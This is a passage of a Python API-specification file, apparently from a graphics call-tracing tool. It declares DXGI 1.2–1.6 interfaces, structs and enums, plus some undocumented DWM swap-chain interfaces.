StdMethod(HRESULT, "MapDesktopSurface", [Out(Pointer(DXGI_MAPPED_RECT), "pLockedRect")], sideeffects=False),
StdMethod(HRESULT, "UnMapDesktopSurface", [], sideeffects=False),
StdMethod(HRESULT, "ReleaseFrame", []),
]
DXGI_ALPHA_MODE = Enum("DXGI_ALPHA_MODE", [
"DXGI_ALPHA_MODE_UNSPECIFIED",
"DXGI_ALPHA_MODE_PREMULTIPLIED",
"DXGI_ALPHA_MODE_STRAIGHT",
"DXGI_ALPHA_MODE_IGNORE",
])
IDXGISurface2 = Interface("IDXGISurface2", IDXGISurface1)
IDXGISurface2.methods += [
StdMethod(HRESULT, "GetResource", [(REFIID, "riid"), Out(Pointer(ObjPointer(Void)), "ppParentResource"), Out(Pointer(UINT), "pSubresourceIndex")]),
]
DXGI_SHARED_RESOURCE_FLAG = Flags(DWORD, [
"DXGI_SHARED_RESOURCE_READ",
"DXGI_SHARED_RESOURCE_WRITE",
])
IDXGIResource1 = Interface("IDXGIResource1", IDXGIResource)
IDXGIResource1.methods += [
StdMethod(HRESULT, "CreateSubresourceSurface", [(UINT, "index"), Out(Pointer(ObjPointer(IDXGISurface2)), "ppSurface")]),
StdMethod(HRESULT, "CreateSharedHandle", [(Pointer(Const(SECURITY_ATTRIBUTES)), "pAttributes"), (DXGI_SHARED_RESOURCE_FLAG, "dwAccess"), (LPCWSTR, "lpName"), Out(Pointer(HANDLE), "pHandle")]),
]
DXGI_OFFER_RESOURCE_PRIORITY = Enum("DXGI_OFFER_RESOURCE_PRIORITY", [
"DXGI_OFFER_RESOURCE_PRIORITY_LOW",
"DXGI_OFFER_RESOURCE_PRIORITY_NORMAL",
"DXGI_OFFER_RESOURCE_PRIORITY_HIGH",
])
IDXGIDevice2 = Interface("IDXGIDevice2", IDXGIDevice1)
IDXGIDevice2.methods += [
StdMethod(HRESULT, "OfferResources", [(UINT, "NumResources"), (Array(Const(ObjPointer(IDXGIResource)), "NumResources"), "ppResources"), (DXGI_OFFER_RESOURCE_PRIORITY, "Priority")]),
StdMethod(HRESULT, "ReclaimResources", [(UINT, "NumResources"), (Array(Const(ObjPointer(IDXGIResource)), "NumResources"), "ppResources"), Out(Pointer(BOOL), "pDiscarded")]),
StdMethod(HRESULT, "EnqueueSetEvent", [(HANDLE, "hEvent")], sideeffects=False),
]
DXGI_MODE_DESC1 = Struct("DXGI_MODE_DESC1", [
(UINT, "Width"),
(UINT, "Height"),
(DXGI_RATIONAL, "RefreshRate"),
(DXGI_FORMAT, "Format"),
(DXGI_MODE_SCANLINE_ORDER, "ScanlineOrdering"),
(DXGI_MODE_SCALING, "Scaling"),
(BOOL, "Stereo"),
])
DXGI_SCALING = Enum("DXGI_SCALING", [
"DXGI_SCALING_STRETCH",
"DXGI_SCALING_NONE",
"DXGI_SCALING_ASPECT_RATIO_STRETCH",
])
DXGI_SWAP_CHAIN_DESC1 = Struct("DXGI_SWAP_CHAIN_DESC1", [
(UINT, "Width"),
(UINT, "Height"),
(DXGI_FORMAT, "Format"),
(BOOL, "Stereo"),
(DXGI_SAMPLE_DESC, "SampleDesc"),
(DXGI_USAGE, "BufferUsage"),
(UINT, "BufferCount"),
(DXGI_SCALING, "Scaling"),
(DXGI_SWAP_EFFECT, "SwapEffect"),
(DXGI_ALPHA_MODE, "AlphaMode"),
(DXGI_SWAP_CHAIN_FLAG, "Flags"),
])
DXGI_SWAP_CHAIN_FULLSCREEN_DESC = Struct("DXGI_SWAP_CHAIN_FULLSCREEN_DESC", [
(DXGI_RATIONAL, "RefreshRate"),
(DXGI_MODE_SCANLINE_ORDER, "ScanlineOrdering"),
(DXGI_MODE_SCALING, "Scaling"),
(BOOL, "Windowed"),
])
DXGI_PRESENT_PARAMETERS = Struct("DXGI_PRESENT_PARAMETERS", [
(UINT, "DirtyRectsCount"),
(Array(RECT, "{self}.DirtyRectsCount"), "pDirtyRects"),
(Pointer(RECT), "pScrollRect"),
(Pointer(POINT), "pScrollOffset"),
])
IDXGISwapChain1 = Interface("IDXGISwapChain1", IDXGISwapChain)
IDXGISwapChain1.methods += [
StdMethod(HRESULT, "GetDesc1", [(Out(Pointer(DXGI_SWAP_CHAIN_DESC1), "pDesc"))], sideeffects=False),
StdMethod(HRESULT, "GetFullscreenDesc", [(Out(Pointer(DXGI_SWAP_CHAIN_FULLSCREEN_DESC), "pDesc"))], sideeffects=False),
StdMethod(HRESULT, "GetHwnd", [(Out(Pointer(HWND), "pHwnd"))], sideeffects=False),
StdMethod(HRESULT, "GetCoreWindow", [(REFIID, "riid"), (Out(Pointer(ObjPointer(Void)), "ppUnk"))]),
StdMethod(HRESULT, "Present1", [(UINT, "SyncInterval"), (DXGI_PRESENT, "Flags"), (Pointer(Const(DXGI_PRESENT_PARAMETERS)), "pPresentParameters")]),
StdMethod(BOOL, "IsTemporaryMonoSupported", [], sideeffects=False),
StdMethod(HRESULT, "GetRestrictToOutput", [(Out(Pointer(ObjPointer(IDXGIOutput)), "ppRestrictToOutput"))]),
StdMethod(HRESULT, "SetBackgroundColor", [(Pointer(Const(DXGI_RGBA)), "pColor")]),
StdMethod(HRESULT, "GetBackgroundColor", [(Out(Pointer(DXGI_RGBA), "pColor"))], sideeffects=False),
StdMethod(HRESULT, "SetRotation", [(DXGI_MODE_ROTATION, "Rotation")]),
StdMethod(HRESULT, "GetRotation", [(Out(Pointer(DXGI_MODE_ROTATION), "pRotation"))], sideeffects=False),
]
IDXGIFactory2 = Interface("IDXGIFactory2", IDXGIFactory1)
IDXGIFactory2.methods += [
StdMethod(BOOL, "IsWindowedStereoEnabled", [], sideeffects=False),
StdMethod(HRESULT, "CreateSwapChainForHwnd", [(ObjPointer(IUnknown), "pDevice"), (HWND, "hWnd"), (Pointer(Const(DXGI_SWAP_CHAIN_DESC1)), "pDesc"), (Pointer(Const(DXGI_SWAP_CHAIN_FULLSCREEN_DESC)), "pFullscreenDesc"), (ObjPointer(IDXGIOutput), "pRestrictToOutput"), Out(Pointer(ObjPointer(IDXGISwapChain1)), "ppSwapChain")]),
StdMethod(HRESULT, "CreateSwapChainForCoreWindow", [(ObjPointer(IUnknown), "pDevice"), (ObjPointer(IUnknown), "pWindow"), (Pointer(Const(DXGI_SWAP_CHAIN_DESC1)), "pDesc"), (ObjPointer(IDXGIOutput), "pRestrictToOutput"), Out(Pointer(ObjPointer(IDXGISwapChain1)), "ppSwapChain")]),
StdMethod(HRESULT, "GetSharedResourceAdapterLuid", [(HANDLE, "hResource"), Out(Pointer(LUID), "pLuid")], sideeffects=False),
StdMethod(HRESULT, "RegisterStereoStatusWindow", [(HWND, "WindowHandle"), (UINT, "wMsg"), Out(Pointer(DWORD), "pdwCookie")], sideeffects=False),
StdMethod(HRESULT, "RegisterStereoStatusEvent", [(HANDLE, "hEvent"), Out(Pointer(DWORD), "pdwCookie")], sideeffects=False),
StdMethod(Void, "UnregisterStereoStatus", [(DWORD, "dwCookie")], sideeffects=False),
StdMethod(HRESULT, "RegisterOcclusionStatusWindow", [(HWND, "WindowHandle"), (UINT, "wMsg"), Out(Pointer(DWORD), "pdwCookie")], sideeffects=False),
StdMethod(HRESULT, "RegisterOcclusionStatusEvent", [(HANDLE, "hEvent"), Out(Pointer(DWORD), "pdwCookie")], sideeffects=False),
StdMethod(Void, "UnregisterOcclusionStatus", [(DWORD, "dwCookie")], sideeffects=False),
StdMethod(HRESULT, "CreateSwapChainForComposition", [(ObjPointer(IUnknown), "pDevice"), (Pointer(Const(DXGI_SWAP_CHAIN_DESC1)), "pDesc"), (ObjPointer(IDXGIOutput), "pRestrictToOutput"), Out(Pointer(ObjPointer(IDXGISwapChain1)), "ppSwapChain")]),
]
DXGI_GRAPHICS_PREEMPTION_GRANULARITY = Enum("DXGI_GRAPHICS_PREEMPTION_GRANULARITY", [
"DXGI_GRAPHICS_PREEMPTION_DMA_BUFFER_BOUNDARY",
"DXGI_GRAPHICS_PREEMPTION_PRIMITIVE_BOUNDARY",
"DXGI_GRAPHICS_PREEMPTION_TRIANGLE_BOUNDARY",
"DXGI_GRAPHICS_PREEMPTION_PIXEL_BOUNDARY",
"DXGI_GRAPHICS_PREEMPTION_INSTRUCTION_BOUNDARY",
])
DXGI_COMPUTE_PREEMPTION_GRANULARITY = Enum("DXGI_COMPUTE_PREEMPTION_GRANULARITY", [
"DXGI_COMPUTE_PREEMPTION_DMA_BUFFER_BOUNDARY",
"DXGI_COMPUTE_PREEMPTION_DISPATCH_BOUNDARY",
"DXGI_COMPUTE_PREEMPTION_THREAD_GROUP_BOUNDARY",
"DXGI_COMPUTE_PREEMPTION_THREAD_BOUNDARY",
"DXGI_COMPUTE_PREEMPTION_INSTRUCTION_BOUNDARY",
])
DXGI_ADAPTER_DESC2 = Struct("DXGI_ADAPTER_DESC2", [
(WString, "Description"),
(UINT, "VendorId"),
(UINT, "DeviceId"),
(UINT, "SubSysId"),
(UINT, "Revision"),
(SIZE_T, "DedicatedVideoMemory"),
(SIZE_T, "DedicatedSystemMemory"),
(SIZE_T, "SharedSystemMemory"),
(LUID, "AdapterLuid"),
(DXGI_ADAPTER_FLAG, "Flags"),
(DXGI_GRAPHICS_PREEMPTION_GRANULARITY, "GraphicsPreemptionGranularity"),
(DXGI_COMPUTE_PREEMPTION_GRANULARITY, "ComputePreemptionGranularity"),
])
IDXGIAdapter2 = Interface("IDXGIAdapter2", IDXGIAdapter1)
IDXGIAdapter2.methods += [
StdMethod(HRESULT, "GetDesc2", [Out(Pointer(DXGI_ADAPTER_DESC2), "pDesc")], sideeffects=False),
]
IDXGIOutput1 = Interface("IDXGIOutput1", IDXGIOutput)
IDXGIOutput1.methods += [
StdMethod(HRESULT, "GetDisplayModeList1", [(DXGI_FORMAT, "EnumFormat"), (DXGI_ENUM_MODES, "Flags"), InOut(Pointer(UINT), "pNumModes"), Out(Array(DXGI_MODE_DESC1, "*pNumModes"), "pDesc")], sideeffects=False),
StdMethod(HRESULT, "FindClosestMatchingMode1", [(Pointer(Const(DXGI_MODE_DESC1)), "pModeToMatch"), Out(Pointer(DXGI_MODE_DESC1), "pClosestMatch"), (ObjPointer(IUnknown), "pConcernedDevice")], sideeffects=False),
StdMethod(HRESULT, "GetDisplaySurfaceData1", [(ObjPointer(IDXGIResource), "pDestination")]),
StdMethod(HRESULT, "DuplicateOutput", [(ObjPointer(IUnknown), "pDevice"), Out(Pointer(ObjPointer(IDXGIOutputDuplication)), "ppOutputDuplication")]),
]
dxgi.addInterfaces([
IDXGIDisplayControl,
IDXGIDevice2,
IDXGISwapChain1,
IDXGIFactory2,
IDXGIResource1,
IDXGIAdapter2,
IDXGIOutput1,
])
#
# DXGI 1.3
#
DXGI_CREATE_FACTORY_FLAGS = Flags(UINT, [
"DXGI_CREATE_FACTORY_DEBUG",
])
dxgi.addFunctions([
StdFunction(HRESULT, "CreateDXGIFactory2", [(DXGI_CREATE_FACTORY_FLAGS, "Flags"), (REFIID, "riid"), Out(Pointer(ObjPointer(Void)), "ppFactory")]),
])
IDXGIDevice3 = Interface("IDXGIDevice3", IDXGIDevice2)
IDXGIDevice3.methods += [
StdMethod(Void, "Trim", []),
]
DXGI_MATRIX_3X2_F = Struct("DXGI_MATRIX_3X2_F", [
(FLOAT, "_11"),
(FLOAT, "_12"),
(FLOAT, "_21"),
(FLOAT, "_22"),
(FLOAT, "_31"),
(FLOAT, "_32"),
])
IDXGISwapChain2 = Interface("IDXGISwapChain2", IDXGISwapChain1)
IDXGISwapChain2.methods += [
StdMethod(HRESULT, "SetSourceSize", [(UINT, "Width"), (UINT, "Height")]),
StdMethod(HRESULT, "GetSourceSize", [Out(Pointer(UINT), "pWidth"), Out(Pointer(UINT), "pHeight")], sideeffects=False),
StdMethod(HRESULT, "SetMaximumFrameLatency", [(UINT, "MaxLatency")]),
StdMethod(HRESULT, "GetMaximumFrameLatency", [Out(Pointer(UINT), "pMaxLatency")], sideeffects=False),
StdMethod(HANDLE, "GetFrameLatencyWaitableObject", [], sideeffects=False),
StdMethod(HRESULT, "SetMatrixTransform", [(Pointer(Const(DXGI_MATRIX_3X2_F)), "pMatrix")]),
StdMethod(HRESULT, "GetMatrixTransform", [Out(Pointer(DXGI_MATRIX_3X2_F), "pMatrix")], sideeffects=False),
]
IDXGIOutput2 = Interface("IDXGIOutput2", IDXGIOutput1)
IDXGIOutput2.methods += [
StdMethod(BOOL, "SupportsOverlays", [], sideeffects=False),
]
IDXGIFactory3 = Interface("IDXGIFactory3", IDXGIFactory2)
IDXGIFactory3.methods += [
StdMethod(DXGI_CREATE_FACTORY_FLAGS, "GetCreationFlags", [], sideeffects=False),
]
DXGI_DECODE_SWAP_CHAIN_DESC = Struct("DXGI_DECODE_SWAP_CHAIN_DESC", [
(UINT, "Flags"),
])
# XXX: Flags
DXGI_MULTIPLANE_OVERLAY_YCbCr_FLAGS = Enum("DXGI_MULTIPLANE_OVERLAY_YCbCr_FLAGS", [
"DXGI_MULTIPLANE_OVERLAY_YCbCr_FLAG_NOMINAL_RANGE",
"DXGI_MULTIPLANE_OVERLAY_YCbCr_FLAG_BT709",
"DXGI_MULTIPLANE_OVERLAY_YCbCr_FLAG_xvYCC",
])
IDXGIDecodeSwapChain = Interface("IDXGIDecodeSwapChain", IUnknown)
IDXGIDecodeSwapChain.methods += [
StdMethod(HRESULT, "PresentBuffer", [(UINT, "BufferToPresent"), (UINT, "SyncInterval"), (DXGI_PRESENT, "Flags")]),
StdMethod(HRESULT, "SetSourceRect", [(Pointer(Const(RECT)), "pRect")]),
StdMethod(HRESULT, "SetTargetRect", [(Pointer(Const(RECT)), "pRect")]),
StdMethod(HRESULT, "SetDestSize", [(UINT, "Width"), (UINT, "Height")]),
StdMethod(HRESULT, "GetSourceRect", [Out(Pointer(RECT), "pRect")], sideeffects=False),
StdMethod(HRESULT, "GetTargetRect", [Out(Pointer(RECT), "pRect")], sideeffects=False),
StdMethod(HRESULT, "GetDestSize", [Out(Pointer(UINT), "pWidth"), Out(Pointer(UINT), "pHeight")], sideeffects=False),
StdMethod(HRESULT, "SetColorSpace", [(DXGI_MULTIPLANE_OVERLAY_YCbCr_FLAGS, "ColorSpace")]),
StdMethod(DXGI_MULTIPLANE_OVERLAY_YCbCr_FLAGS, "GetColorSpace", [], sideeffects=False),
]
IDXGIFactoryMedia = Interface("IDXGIFactoryMedia", IUnknown)
IDXGIFactoryMedia.methods += [
StdMethod(HRESULT, "CreateSwapChainForCompositionSurfaceHandle", [(ObjPointer(IUnknown), "pDevice"), (HANDLE, "hSurface"), (Pointer(Const(DXGI_SWAP_CHAIN_DESC1)), "pDesc"), (ObjPointer(IDXGIOutput), "pRestrictToOutput"), Out(Pointer(ObjPointer(IDXGISwapChain1)), "ppSwapChain")]),
StdMethod(HRESULT, "CreateDecodeSwapChainForCompositionSurfaceHandle", [(ObjPointer(IUnknown), "pDevice"), (HANDLE, "hSurface"), (Pointer(DXGI_DECODE_SWAP_CHAIN_DESC), "pDesc"), (ObjPointer(IDXGIResource), "pYuvDecodeBuffers"), (ObjPointer(IDXGIOutput), "pRestrictToOutput"), Out(Pointer(ObjPointer(IDXGIDecodeSwapChain)), "ppSwapChain")]),
]
DXGI_FRAME_PRESENTATION_MODE = Enum("DXGI_FRAME_PRESENTATION_MODE", [
"DXGI_FRAME_PRESENTATION_MODE_COMPOSED",
"DXGI_FRAME_PRESENTATION_MODE_OVERLAY",
"DXGI_FRAME_PRESENTATION_MODE_NONE",
])
DXGI_FRAME_STATISTICS_MEDIA = Struct("DXGI_FRAME_STATISTICS_MEDIA", [
(UINT, "PresentCount"),
(UINT, "PresentRefreshCount"),
(UINT, "SyncRefreshCount"),
(LARGE_INTEGER, "SyncQPCTime"),
(LARGE_INTEGER, "SyncGPUTime"),
(DXGI_FRAME_PRESENTATION_MODE, "CompositionMode"),
(UINT, "ApprovedPresentDuration"),
])
IDXGISwapChainMedia = Interface("IDXGISwapChainMedia", IUnknown)
IDXGISwapChainMedia.methods += [
StdMethod(HRESULT, "GetFrameStatisticsMedia", [Out(Pointer(DXGI_FRAME_STATISTICS_MEDIA), "pStats")], sideeffects=False),
StdMethod(HRESULT, "SetPresentDuration", [(UINT, "Duration")]),
StdMethod(HRESULT, "CheckPresentDurationSupport", [(UINT, "DesiredPresentDuration"), Out(Pointer(UINT), "pClosestSmallerPresentDuration"), Out(Pointer(UINT), "pClosestLargerPresentDuration")], sideeffects=False),
]
DXGI_OVERLAY_SUPPORT_FLAG = FakeEnum(UINT, [
"DXGI_OVERLAY_SUPPORT_FLAG_DIRECT",
"DXGI_OVERLAY_SUPPORT_FLAG_SCALING",
])
IDXGIOutput3 = Interface("IDXGIOutput3", IDXGIOutput2)
IDXGIOutput3.methods += [
StdMethod(HRESULT, "CheckOverlaySupport", [(DXGI_FORMAT, "EnumFormat"), (ObjPointer(IUnknown), "pConcernedDevice"), Out(Pointer(DXGI_OVERLAY_SUPPORT_FLAG), "pFlags")], sideeffects=False),
]
dxgi.addInterfaces([
IDXGIDevice3,
IDXGISwapChain2,
IDXGISwapChainMedia,
IDXGIOutput3,
IDXGIFactory3,
IDXGIFactoryMedia,
])
#
# Undocumented interfaces
#
IDXGIFactoryDWM = Interface("IDXGIFactoryDWM", IUnknown)
IDXGISwapChainDWM = Interface("IDXGISwapChainDWM", IDXGIDeviceSubObject)
IDXGIFactoryDWM.methods += [
StdMethod(HRESULT, "CreateSwapChain", [(ObjPointer(IUnknown), "pDevice"), (Pointer(DXGI_SWAP_CHAIN_DESC), "pDesc"), (ObjPointer(IDXGIOutput), "pOutput"), Out(Pointer(ObjPointer(IDXGISwapChainDWM)), "ppSwapChain")]),
]
# http://shchetinin.blogspot.co.uk/2012/04/dwm-graphics-directx-win8win7.html
IDXGISwapChainDWM.methods += [
StdMethod(HRESULT, "Present", [(UINT, "SyncInterval"), (DXGI_PRESENT, "Flags")]),
StdMethod(HRESULT, "GetBuffer", [(UINT, "Buffer"), (REFIID, "riid"), Out(Pointer(ObjPointer(Void)), "ppSurface")]),
StdMethod(HRESULT, "GetDesc", [Out(Pointer(DXGI_SWAP_CHAIN_DESC), "pDesc")], sideeffects=False),
StdMethod(HRESULT, "ResizeBuffers", [(UINT, "BufferCount"), (UINT, "Width"), (UINT, "Height"), (DXGI_FORMAT, "NewFormat"), (DXGI_SWAP_CHAIN_FLAG, "SwapChainFlags")]),
StdMethod(HRESULT, "ResizeTarget", [(Pointer(Const(DXGI_MODE_DESC)), "pNewTargetParameters")]),
StdMethod(HRESULT, "GetContainingOutput", [Out(Pointer(ObjPointer(IDXGIOutput)), "ppOutput")]),
StdMethod(HRESULT, "GetFrameStatistics", [Out(Pointer(DXGI_FRAME_STATISTICS), "pStats")], sideeffects=False),
StdMethod(HRESULT, "GetLastPresentCount", [Out(Pointer(UINT), "pLastPresentCount")], sideeffects=False),
]
dxgi.addInterfaces([
IDXGIFactoryDWM,
])
#
# DXGI 1.4
#
DXGI_COLOR_SPACE_TYPE = Enum('DXGI_COLOR_SPACE_TYPE', [
'DXGI_COLOR_SPACE_RGB_FULL_G22_NONE_P709',
'DXGI_COLOR_SPACE_RGB_FULL_G10_NONE_P709',
'DXGI_COLOR_SPACE_RGB_STUDIO_G22_NONE_P709',
'DXGI_COLOR_SPACE_RGB_STUDIO_G22_NONE_P2020',
'DXGI_COLOR_SPACE_RESERVED',
'DXGI_COLOR_SPACE_YCBCR_FULL_G22_NONE_P709_X601',
'DXGI_COLOR_SPACE_YCBCR_STUDIO_G22_LEFT_P601',
'DXGI_COLOR_SPACE_YCBCR_FULL_G22_LEFT_P601',
'DXGI_COLOR_SPACE_YCBCR_STUDIO_G22_LEFT_P709',
'DXGI_COLOR_SPACE_YCBCR_FULL_G22_LEFT_P709',
'DXGI_COLOR_SPACE_YCBCR_STUDIO_G22_LEFT_P2020',
'DXGI_COLOR_SPACE_YCBCR_FULL_G22_LEFT_P2020',
'DXGI_COLOR_SPACE_CUSTOM',
])
DXGI_SWAP_CHAIN_COLOR_SPACE_SUPPORT_FLAG = Enum('DXGI_SWAP_CHAIN_COLOR_SPACE_SUPPORT_FLAG', [
'DXGI_SWAP_CHAIN_COLOR_SPACE_SUPPORT_FLAG_PRESENT',
'DXGI_SWAP_CHAIN_COLOR_SPACE_SUPPORT_FLAG_OVERLAY_PRESENT',
])
DXGI_OVERLAY_COLOR_SPACE_SUPPORT_FLAG = Enum('DXGI_OVERLAY_COLOR_SPACE_SUPPORT_FLAG', [
'DXGI_OVERLAY_COLOR_SPACE_SUPPORT_FLAG_PRESENT',
])
DXGI_MEMORY_SEGMENT_GROUP = Enum('DXGI_MEMORY_SEGMENT_GROUP', [
'DXGI_MEMORY_SEGMENT_GROUP_LOCAL',
'DXGI_MEMORY_SEGMENT_GROUP_NON_LOCAL',
])
DXGI_QUERY_VIDEO_MEMORY_INFO = Struct('DXGI_QUERY_VIDEO_MEMORY_INFO', [
(UINT64, 'Budget'),
(UINT64, 'CurrentUsage'),
(UINT64, 'AvailableForReservation'),
(UINT64, 'CurrentReservation'),
])
IDXGISwapChain3 = Interface('IDXGISwapChain3', IDXGISwapChain2)
IDXGIOutput4 = Interface('IDXGIOutput4', IDXGIOutput3)
IDXGIFactory4 = Interface('IDXGIFactory4', IDXGIFactory3)
IDXGIAdapter3 = Interface('IDXGIAdapter3', IDXGIAdapter2)
IDXGISwapChain3.methods += [
StdMethod(UINT, 'GetCurrentBackBufferIndex', []),
StdMethod(HRESULT, 'CheckColorSpaceSupport', [(DXGI_COLOR_SPACE_TYPE, 'ColorSpace'), Out(Pointer(UINT), 'pColorSpaceSupport')], sideeffects=False),
StdMethod(HRESULT, 'SetColorSpace1', [(DXGI_COLOR_SPACE_TYPE, 'ColorSpace')]),
StdMethod(HRESULT, 'ResizeBuffers1', [(UINT, 'BufferCount'), (UINT, 'Width'), (UINT, 'Height'), (DXGI_FORMAT, 'Format'), (DXGI_SWAP_CHAIN_FLAG, 'SwapChainFlags'), (Pointer(Const(UINT)), 'pCreationNodeMask'), (Array(Const(ObjPointer(IUnknown)), 'BufferCount'), 'ppPresentQueue')]),
]
IDXGIOutput4.methods += [
StdMethod(HRESULT, 'CheckOverlayColorSpaceSupport', [(DXGI_FORMAT, 'Format'), (DXGI_COLOR_SPACE_TYPE, 'ColorSpace'), (ObjPointer(IUnknown), 'pConcernedDevice'), Out(Pointer(UINT), 'pFlags')], sideeffects=False),
]
IDXGIFactory4.methods += [
StdMethod(HRESULT, 'EnumAdapterByLuid', [(LUID, 'AdapterLuid'), (REFIID, 'riid'), Out(Pointer(ObjPointer(Void)), 'ppvAdapter')]),
StdMethod(HRESULT, 'EnumWarpAdapter', [(REFIID, 'riid'), Out(Pointer(ObjPointer(Void)), 'ppvAdapter')]),
]
IDXGIAdapter3.methods += [
StdMethod(HRESULT, 'RegisterHardwareContentProtectionTeardownStatusEvent', [(HANDLE, 'hEvent'), Out(Pointer(DWORD), 'pdwCookie')], sideeffects=False),
StdMethod(Void, 'UnregisterHardwareContentProtectionTeardownStatus', [(DWORD, 'dwCookie')], sideeffects=False),
StdMethod(HRESULT, 'QueryVideoMemoryInfo', [(UINT, 'NodeIndex'), (DXGI_MEMORY_SEGMENT_GROUP, 'MemorySegmentGroup'), Out(Pointer(DXGI_QUERY_VIDEO_MEMORY_INFO), 'pVideoMemoryInfo')], sideeffects=False),
StdMethod(HRESULT, 'SetVideoMemoryReservation', [(UINT, 'NodeIndex'), (DXGI_MEMORY_SEGMENT_GROUP, 'MemorySegmentGroup'), (UINT64, 'Reservation')]),
StdMethod(HRESULT, 'RegisterVideoMemoryBudgetChangeNotificationEvent', [(HANDLE, 'hEvent'), Out(Pointer(DWORD), 'pdwCookie')], sideeffects=False),
StdMethod(Void, 'UnregisterVideoMemoryBudgetChangeNotification', [(DWORD, 'dwCookie')], sideeffects=False),
]
dxgi.addInterfaces([
IDXGISwapChain3,
IDXGIOutput4,
IDXGIFactory4,
IDXGIAdapter3,
])
#
# DXGI 1.5
#
DXGI_HDR_METADATA_TYPE = Enum('DXGI_HDR_METADATA_TYPE', [
'DXGI_HDR_METADATA_TYPE_NONE',
'DXGI_HDR_METADATA_TYPE_HDR10',
])
DXGI_HDR_METADATA_HDR10 = Struct('DXGI_HDR_METADATA_HDR10', [
(Array(UINT16, 2), 'RedPrimary'),
(Array(UINT16, 2), 'GreenPrimary'),
(Array(UINT16, 2), 'BluePrimary'),
(Array(UINT16, 2), 'WhitePoint'),
(UINT, 'MaxMasteringLuminance'),
(UINT, 'MinMasteringLuminance'),
(UINT16, 'MaxContentLightLevel'),
(UINT16, 'MaxFrameAverageLightLevel'),
])
DXGI_OFFER_RESOURCE_FLAGS = FakeEnum(UINT, [
'DXGI_OFFER_RESOURCE_FLAG_ALLOW_DECOMMIT',
])
DXGI_RECLAIM_RESOURCE_RESULTS = Enum('DXGI_RECLAIM_RESOURCE_RESULTS', [
'DXGI_RECLAIM_RESOURCE_RESULT_OK',
'DXGI_RECLAIM_RESOURCE_RESULT_DISCARDED',
'DXGI_RECLAIM_RESOURCE_RESULT_NOT_COMMITTED',
])
DXGI_FEATURE, DXGI_FEATURE_DATA = EnumPolymorphic('DXGI_FEATURE', 'Feature', [
('DXGI_FEATURE_PRESENT_ALLOW_TEARING', Pointer(BOOL)),
], Blob(Void, "FeatureSupportDataSize"), False)
IDXGIOutput5 = Interface('IDXGIOutput5', IDXGIOutput4)
IDXGISwapChain4 = Interface('IDXGISwapChain4', IDXGISwapChain3)
IDXGIDevice4 = Interface('IDXGIDevice4', IDXGIDevice3)
IDXGIFactory5 = Interface('IDXGIFactory5', IDXGIFactory4)
IDXGIOutput5.methods += [
StdMethod(HRESULT, 'DuplicateOutput1', [(ObjPointer(IUnknown), 'pDevice'), (UINT, 'Flags'), (UINT, 'SupportedFormatsCount'), (Array(Const(DXGI_FORMAT), 'SupportedFormatsCount'), 'pSupportedFormats'), Out(Pointer(ObjPointer(IDXGIOutputDuplication)), 'ppOutputDuplication')]),
]
IDXGISwapChain4.methods += [
StdMethod(HRESULT, 'SetHDRMetaData', [(DXGI_HDR_METADATA_TYPE, 'Type'), (UINT, 'Size'), (Blob(Void, 'Size'), 'pMetaData')]),
]
IDXGIDevice4.methods += [
StdMethod(HRESULT, 'OfferResources1', [(UINT, 'NumResources'), (Array(Const(ObjPointer(IDXGIResource)), 'NumResources'), 'ppResources'), (DXGI_OFFER_RESOURCE_PRIORITY, 'Priority'), (DXGI_OFFER_RESOURCE_FLAGS, 'Flags')]),
StdMethod(HRESULT, 'ReclaimResources1', [(UINT, 'NumResources'), (Array(Const(ObjPointer(IDXGIResource)), 'NumResources'), 'ppResources'), Out(Array(DXGI_RECLAIM_RESOURCE_RESULTS, 'NumResources'), 'pResults')]),
]
IDXGIFactory5.methods += [
StdMethod(HRESULT, 'CheckFeatureSupport', [(DXGI_FEATURE, 'Feature'), Out(DXGI_FEATURE_DATA, 'pFeatureSupportData'), (UINT, 'FeatureSupportDataSize')], sideeffects=False),
]
dxgi.addInterfaces([
IDXGIOutput5,
IDXGISwapChain4,
IDXGIDevice4,
IDXGIFactory5,
])
#
# DXGI 1.6
#
DXGI_ADAPTER_FLAG3 = Enum('DXGI_ADAPTER_FLAG3', [
'DXGI_ADAPTER_FLAG3_NONE',
'DXGI_ADAPTER_FLAG3_REMOTE',
'DXGI_ADAPTER_FLAG3_SOFTWARE',
'DXGI_ADAPTER_FLAG3_ACG_COMPATIBLE',
'DXGI_ADAPTER_FLAG3_FORCE_DWORD',
'DXGI_ADAPTER_FLAG3_SUPPORT_MONITORED_FENCES',
'DXGI_ADAPTER_FLAG3_SUPPORT_NON_MONITORED_FENCES',
'DXGI_ADAPTER_FLAG3_KEYED_MUTEX_CONFORMANCE',
])
DXGI_ADAPTER_DESC3 = Struct('DXGI_ADAPTER_DESC3', [
(WString, 'Description'),
(UINT, 'VendorId'),
(UINT, 'DeviceId'),
(UINT, 'SubSysId'),
(UINT, 'Revision'),
(SIZE_T, 'DedicatedVideoMemory'),
(SIZE_T, 'DedicatedSystemMemory'),
(SIZE_T, 'SharedSystemMemory'),
(LUID, 'AdapterLuid'),
(DXGI_ADAPTER_FLAG3, 'Flags'),
(DXGI_GRAPHICS_PREEMPTION_GRANULARITY, 'GraphicsPreemptionGranularity'),
(DXGI_COMPUTE_PREEMPTION_GRANULARITY, 'ComputePreemptionGranularity'),
])
DXGI_OUTPUT_DESC1 = Struct('DXGI_OUTPUT_DESC1', [
(WString, 'DeviceName'),
(RECT, 'DesktopCoordinates'),
(BOOL, 'AttachedToDesktop'),
(DXGI_MODE_ROTATION, 'Rotation'),
(HMONITOR, 'Monitor'),
(UINT, 'BitsPerColor'),
(DXGI_COLOR_SPACE_TYPE, 'ColorSpace'),
(Array(FLOAT, 2), 'RedPrimary'),
(Array(FLOAT, 2), 'GreenPrimary'),
(Array(FLOAT, 2), 'BluePrimary'),
(Array(FLOAT, 2), 'WhitePoint'),
(FLOAT, 'MinLuminance'),
(FLOAT, 'MaxLuminance'),
(FLOAT, 'MaxFullFrameLuminance'),
])
DXGI_HARDWARE_COMPOSITION_SUPPORT_FLAGS = Flags(UINT, [
'DXGI_HARDWARE_COMPOSITION_SUPPORT_FLAG_FULLSCREEN',
'DXGI_HARDWARE_COMPOSITION_SUPPORT_FLAG_WINDOWED',
'DXGI_HARDWARE_COMPOSITION_SUPPORT_FLAG_CURSOR_STRETCHED',
])
DXGI_GPU_PREFERENCE = Enum('DXGI_GPU_PREFERENCE', [
'DXGI_GPU_PREFERENCE_UNSPECIFIED',
'DXGI_GPU_PREFERENCE_MINIMUM_POWER',
'DXGI_GPU_PREFERENCE_HIGH_PERFORMANCE',
])
IDXGIFactory6 = Interface('IDXGIFactory6', IDXGIFactory5)
